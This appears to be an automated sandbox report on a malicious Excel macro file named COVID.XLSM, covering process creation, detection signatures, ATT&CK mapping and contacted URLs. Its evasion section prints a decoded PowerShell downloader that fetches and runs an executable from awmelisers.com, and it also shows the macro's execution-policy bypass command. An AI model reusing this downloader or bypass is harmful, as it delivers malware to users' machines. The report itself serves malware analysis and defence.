Source: Document image extraction number: 1 | Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the decryption of the document
Document contains an embedded VBA macro which may execute processes
Source: COVID.XLSM | OLE, VBA macro line: Set objConfig = objStartup.SpawnInstance_
Very long command line found
Source: unknown | Process created: Commandline size = 3581
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3569
Document contains an embedded VBA macro with suspicious strings
Source: COVID.XLSM | OLE, VBA macro line: strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
Source: Process Memory Space: powershell.exe PID: 5860, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA36020DAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA36020CA8
Source: COVID.XLSM | OLE, VBA macro line: Private Sub Workbook_Open()
Source: COVID.XLSM | OLE indicator, VBA macros: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC [base64 argument omitted]
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC [base64 argument omitted]
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{4DB9AD88-5219-4A50-B7BA-DED0ECFD4DAD} - OProcSessId.dat
Source: classification engine | Classification label: mal84.expl.evad.winXLSM@6/7@1/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: COVID.XLSM | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: COVID.XLSM | Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: COVID.XLSM | Initial sample: OLE zip file path = xl/media/image1.png
Source: COVID.XLSM | Initial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
Source: COVID.XLSM | Initial sample: OLE zip file path = xl/comments1.xml
Source: COVID.XLSM | Initial sample: OLE zip file path = xl/comments2.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.729401670.000002E1FB280000.00000004.00000001.sdmp
Source: COVID.XLSM | Initial sample: OLE summary subject = Removed Hoo36:HA/HB/HQ and corresponding crosswalk and 2nd modifer codes per CABHA policy and IU82.

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544 | Thread sleep count: 4519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600 | Thread sleep count: 4552 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000006.00000002.729515196.000002E1FB302000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:1.
Source: powershell.exe, 00000006.00000002.729430572.000002E1FB295000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC [base64 argument omitted]
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded function PS-InstallerV2 { param( [Parameter(Mandatory=$true, Position=0)] [string] $link, [Parameter(Mandatory=$true, Position=1)] [string] $endpoint, [Parameter(Mandatory=$true, Position=2)] [string] $file_dir, [Parameter(Mandatory=$true, Position=3)] [string] $file_name, [Parameter(Mandatory=$true, Position=4)] [string]$extension, [Parameter(Mandatory=$true, Position=5)] [bool] $use_access, [Parameter(Position=6)] [string] $access_string ) $internal_memory = New-Object IO.MemoryStream $req_str = $link + "/" + $endpoint if ($use_access) { $req_str = $req_str + "/" + $access_string } $save_path = $file_dir + "\" + $file_name + "." + $extension $request = [System.Net.WebRequest]::Create("$req_str") $response = $request.GetResponse() $response_stream = $response.GetResponseStream() $response_stream.CopyTo($internal_memory) Set-Content $save_path -Value $internal_memory.ToArray() -Encoding Byte $response_stream.Close() $internal_memory.Close() Start-Process -FilePath $save_path}PS-InstallerV2 "https://awmelisers.com" "api/v3/achyranthes/contrapolarization/kulturkreis" "C:\ProgramData" "Awmelisers Service" "exe" $False
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC [base64 argument omitted]
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC [base64 argument omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation11 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter11 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scripting22 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion21 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution3 | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | Virtualization/Sandbox Evasion21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell2 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Application Window Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting22 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Extra Window Memory Injection1 | DCSync | File and Directory Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
COVID.XLSM | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
awmelisers.com | 8% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://go.microsoft.co | 0% | Virustotal |
https://go.microsoft.co | 0% | Avira URL Cloud | safe
https://roaming.edog. | 0% | URL Reputation | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis | 8% | Virustotal |
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://awmelisers.com | 8% | Virustotal |
https://awmelisers.com | 0% | Avira URL Cloud | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
awmelisers.com | 206.81.23.172 | true | true | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://login.microsoftonline.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://shell.suite.office.com:1443 | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://go.microsoft.co | powershell.exe, 00000006.00000002.728979309.000002E1FAEBD000.00000004.00000001.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://autodiscover-s.outlook.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://roaming.edog. | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://cdn.entity. | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://powerlift.acompli.net | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://cortana.ai | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://api.aadrm.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://api.microsoftstream.com/api/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://cr.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp | false | | high
https://portal.office.com/account/?ref=ClientMeControl | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmp | false | | high
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis | powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp | true | 8%, Virustotal; Avira URL Cloud: safe | unknown
https://graph.ppe.windows.net | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://store.office.cn/addinstemplate | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp | false | | high
https://go.micro | powershell.exe, 00000006.00000002.725312158.000002E1E45EF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://globaldisco.crm.dynamics.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://contoso.com/Icon | powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://store.officeppe.com/addinstemplate | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://web.microsoftstream.com/video/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://graph.windows.net | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://dataservice.o365filtering.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp | false | | high
https://officesetup.getmicrosoftkey.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://awmelisers.com | powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmp, PowerShell_transcript.675052.5LFBxafq.20210826072919.txt.6.dr | true | 8%, Virustotal; Avira URL Cloud: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://ncus.contentsync. | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
http://weather.service.msn.com/data.aspx | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://apis.live.net/v5.0/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://management.azure.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://wus2.contentsync. | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://clients.config.office.net/user/v1.0/ios | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://insertmedia.bing.office.net/odc/insertmedia | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://outlook.office365.com/api/v1.0/me/Activities | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://api.office.net | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://incidents.diagnosticssdf.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://entitlement.diagnostics.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://substrate.office.com/search/api/v2/init | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://outlook.office.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://storage.live.com/clientlogs/uploadlocation | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://outlook.office365.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://webshell.suite.office.com | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://substrate.office.com/search/api/v1/SearchHistory | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://contoso.com/ | powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://management.azure.com/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://login.windows.net/common/oauth2/authorize | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net/ | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
https://api.powerbi.com/beta/myorg/imports | BF4B57C3-D181-4204-9680-790D8457BA20.0.dr | false | | high
                                                                                                                                      https://devnull.onenote.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://ncus.pagecontentsync.BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://messaging.office.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
